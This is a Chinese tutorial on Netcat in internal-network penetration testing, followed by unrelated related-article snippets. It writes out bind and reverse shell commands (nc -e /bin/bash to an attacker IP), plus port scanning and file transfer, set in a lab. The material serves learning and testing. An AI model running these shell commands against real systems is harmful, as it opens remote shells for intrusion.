内网隧道代理技术(五)之 Netcat反弹Shell

news/2024/11/8 20:34:42/

Netcat反弹Shell

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下:

参数作用
-c指定连接后要执行的shell命令
-e指定连接后要执行的文件名
-k配置 Socket一直存活(若不想退出 Shell后使监听断开可使用此参数)
-l监听模式
-p设置本地主机使用的通信端口
-u使用UDP传输协议,默认为TCP
-v显示指令执行过程,用-vv会更详细

一、正向反弹Shell

实验拓扑

在这里插入图片描述

机器名称IP
攻击机器192.168.41.20
服务器192.168.41.130

实验介绍

攻击者机器192.168.41.20 和服务器 192.168.41.130 可以相互的访问,这个时候可以使用正向shell

实验复现

1)在服务器上运行:

#windows机器
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe 
#linux机器
nc -lvvp 1111 -e /bin/bash 

在这里插入图片描述

2)在攻击机上运行

nc64.exe 192.168.41.130 1111

在这里插入图片描述

3)拿到正向的shell

在这里插入图片描述

二、反向反弹Shell

实验拓扑

在这里插入图片描述

机器名称IP
攻击机器192.168.41.20
服务器192.168.41.130

实验介绍

攻击者机器 192.168.41.20 不能直接访问服务器,但是服务器 192.168.41.130 可以访问攻击者的机器,这个时候可以使用反向shell

实验复现

1)在攻击者机器运行

#监听1111端口
nc64.exe -lvvp 1111 

在这里插入图片描述

2)在服务器上运行 (反弹到攻击机)

#windos机器
nc64.exe -e C:\Windows\System32\cmd.exe 192.168.41.20 1111 
#linux机器
nc -e /bin/bash 192.168.41.20 1111

在这里插入图片描述

3)攻击机拿到反向的shell

在这里插入图片描述

三、 Netcat的其他用法

Banner 的抓取

靶机运行着ssh服务,可以查看服务的版本

nc64.exe -nv IP Port

在这里插入图片描述

端口探测

可以查看端口的开放情况,可以看到我们目标服务器的80端口没有开放

nc64.exe -v IP Port

在这里插入图片描述

多端口扫描

可以查看多端口是否开放和允许的服务

nc -v -z IP Port[1]-Port[65535]

在这里插入图片描述

端口监听

监听端口,当访问该端口会输出该信息

nc64.exe -l -p Port

在这里插入图片描述

文件传输

机器IP
接受端192.168.41.132
发送端192.168.41.20

接收端文件夹下为空

在这里插入图片描述
接收端执行命令

nc -lp Port > file

在这里插入图片描述
发送端执行命令

nc -vn IP Port < file -w 1 

在这里插入图片描述

接收端接收到文件

在这里插入图片描述

简易聊天

攻击机执行

nc -l -p Port

在这里插入图片描述

服务器执行

nc64.exe -vn IP Port

在这里插入图片描述

攻击机收到聊天

在这里插入图片描述


http://www.ppmy.cn/news/556331.html

相关文章

PyQt6中文手册

PyQt6中文手册 一、PyQt6 简介 最后更新于 2021.04.22 本教程是 PyQt6 的入门教程。本教程的目的是让您开始使用 PyQt6 库。 关于 PyQt6 PyQt6 Digia 公司的 Qt 程序的 Python 中间件。Qt库是最强大的GUI库之一。PyQt6的官网&#xff1a;www.riverbankcomputing.co.uk/new…

手机分期付款你会想到什么

现代社会&#xff0c;人们可谓是手机不离身。我们的工作、生活也离不开手机。然而&#xff0c;一款性能好的手机&#xff0c;其价钱也是相当可观的。对于一些低消费人群来说&#xff0c;手机分期付款不失为一种好的方式&#xff0c;这样一定程度上能缓解经济压力&#xff0c;还…

苹果内购退款需要注意的一些东西

首先你的账号是要在3个月内经常使用的&#xff0c;活跃度高&#xff0c;这只是最佳选择&#xff0c;并不是一定&#xff0c;因为我处理过的也有不少注册满一个月就处理下来的。越狱过的手机账号也是无法处理的&#xff0c;也不排除万一个别。因为从数据来看越狱这样的几率是很小…

【IAP支付之三】苹果IAP安全支付与防范 receipt收据验证

这里网上的朋友已经介绍的很详细了&#xff0c;具体的链接已经无法找到了。 这里主要说几点本人在开发中遇到的问题: 1.漏单必须要处理&#xff0c;玩家花RMB购买的东西却丢失了&#xff0c;是绝对不能容忍的。所谓的漏单就是玩家已经正常付费&#xff0c;却没有拿到该拿的道具…

苹果应用商店支持人民币信用卡(已验证,有图有真相)

今日打开i4上的app store&#xff0c;惊奇发现货币单位已从$变为&#xffe5;。惊讶万分&#xff0c;于是测试一下&#xff0c;随机找了一个25元的航班追踪应用。屏幕弹出登录界面后&#xff0c;输入appleid&#xff0c;随后出现一个用户协议&#xff0c;居然有十八页&#xff…

苹果支付(内购项目)回调验证

返回的加密参数-苹果支付返回的参数 $receipt_data"MIIbWQYJKoZIhvcNAQcCoIIbSjCCG0YCAQExCzAJBgUrDgMCGgUA......";function validate_apple_pay($receipt_data) { // $receipt_datadsfsfs;/** * 21000 App Store无法读取您提供的JSON对象。* 21002 该receipt-…

深度相机之iPhone X选择的秘诀和方法

版权声明&#xff1a;本文为博主原创文章&#xff0c;未经博主允许不得转载。违者必究。 https://blog.csdn.net/electech6/article/details/78889057 </div><link rel"stylesheet" href"https://csdnimg.cn/release/phoenix/template/css/ck_h…

原相机怎么拍出网图_教你如何用iPhone原相机拍照也能网红风

首先 发这俩张对比图的我 真的下了很大的决心了 哈哈哈哈哈哈 所以希望你们认真的看完 我要强调一下 这张照片是用iPhone自带的原相机拍的 因为一般用faceu或者b612 拍出来的照片都磨皮放大眼睛什么的 特别特别的假哈哈哈哈 假到大家都长一个样 反而我觉得自带相机拍出来的照片…